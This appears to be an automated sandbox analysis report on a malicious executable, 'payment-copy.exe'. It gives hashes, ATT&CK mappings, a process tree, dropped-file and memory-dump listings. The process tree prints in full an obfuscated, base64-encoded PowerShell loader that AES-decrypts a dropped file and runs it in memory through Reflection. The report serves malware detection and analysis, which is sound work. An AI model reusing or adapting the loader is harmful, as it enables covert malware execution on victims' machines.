7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66

General

Target

payment-copy.exe
Size

967KB
MD5

d3a9f004ba265edd72885e34c49f673d
SHA1

4ce4a1edae2381eef1f8b1e4977aa97e8f1a2c12
SHA256

7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66
SHA512

2824c5a3d6e059d22319c8c9fdd5287e35a73a00fa8ecaa296eb4459520c743d8685396f69c6924771bc1e1dea07db4cb7472a2866d9d27b6ea12c0d4d765bd8
SSDEEP

24576:H44YhHQqHxaH6gHHOgGlkj1rZKVgRI2joSG:Hud9HYaw7rXmKG

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2144	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2144	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 2144	1728	payment-copy.exe	30
PID 1728 wrote to memory of 2144	1728	payment-copy.exe	30
PID 1728 wrote to memory of 2144	1728	payment-copy.exe	30

C:\Users\Admin\AppData\Local\Temp\payment-copy.exe
"C:\Users\Admin\AppData\Local\Temp\payment-copy.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA5ADYALAAgADAAeABGAEUALAAgADAAeAA2AEUALAAgADAAeAA0ADcALAAgADAAeABEADMALAAgADAAeABCAEMALAAgADAAeABDAEQALAAgADAAeAA2ADkALAAgADAAeAAwADIALAAgADAAeAAzAEUALAAgADAAeAA3ADAALAAgADAAeAAxADEALAAgADAAeABCAEMALAAgADAAeAAwADUALAAgADAAeAA5AEIALAAgADAAeAAzADAALAAgADAAeAA3AEQALAAgADAAeAA4ADAALAAgADAAeAA3AEYALAAgADAAeABEADcALAAgADAAeABCADAALAAgADAAeAA0ADQALAAgADAAeAAwADAALAAgADAAeABGADkALAAgADAAeAA5ADcALAAgADAAeAA1ADYALAAgADAAeABBAEQALAAgADAAeAA4ADYALAAgADAAeABEADgALAAgADAAeAAxADAALAAgADAAeAA4ADcALAAgADAAeABGADAAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA4ADUALAAgADAAeABGADYALAAgADAAeAA4AEIALAAgADAAeABEAEEALAAgADAAeABEAEQALAAgADAAeAAxAEEALAAgADAAeAAwADkALAAgADAAeABEADYALAAgADAAeAAwAEUALAAgADAAeAA3ADcALAAgADAAeAA4ADcALAAgADAAeAA1AEIALAAgADAAeAAzAEYALAAgADAAeAA1AEYALAAgADAAeABFADAALAAgADAAeABGADEAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-22997.putik

Filesize
20KB

MD5
bbe1d8c160f3469ee9597f7545aa1831

SHA1
b4a91b271fb726fbf5fcebc2fd074e00903e0a8c

SHA256
16d4ad67a7560d357ead7f47264f7ca7cce06d0a1d74073b10047e22b1904dc8

SHA512
3fd84612c20fd61adecaf1ba9c68605d4c37193f3740dc191431ce0028c10b616ca5c6845292f36c99ad5d8914f0d0e7ccf25cd89f595ce8d02478536a4d7a4a

Download Submit
memory/2144-5-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

Filesize
4KB

Download
memory/2144-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2144-7-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2144-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2144-6-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2144-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2144-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2144-12-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2144-14-0x0000000002AF0000-0x0000000002AFA000-memory.dmp

Filesize
40KB

Download
memory/2144-15-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing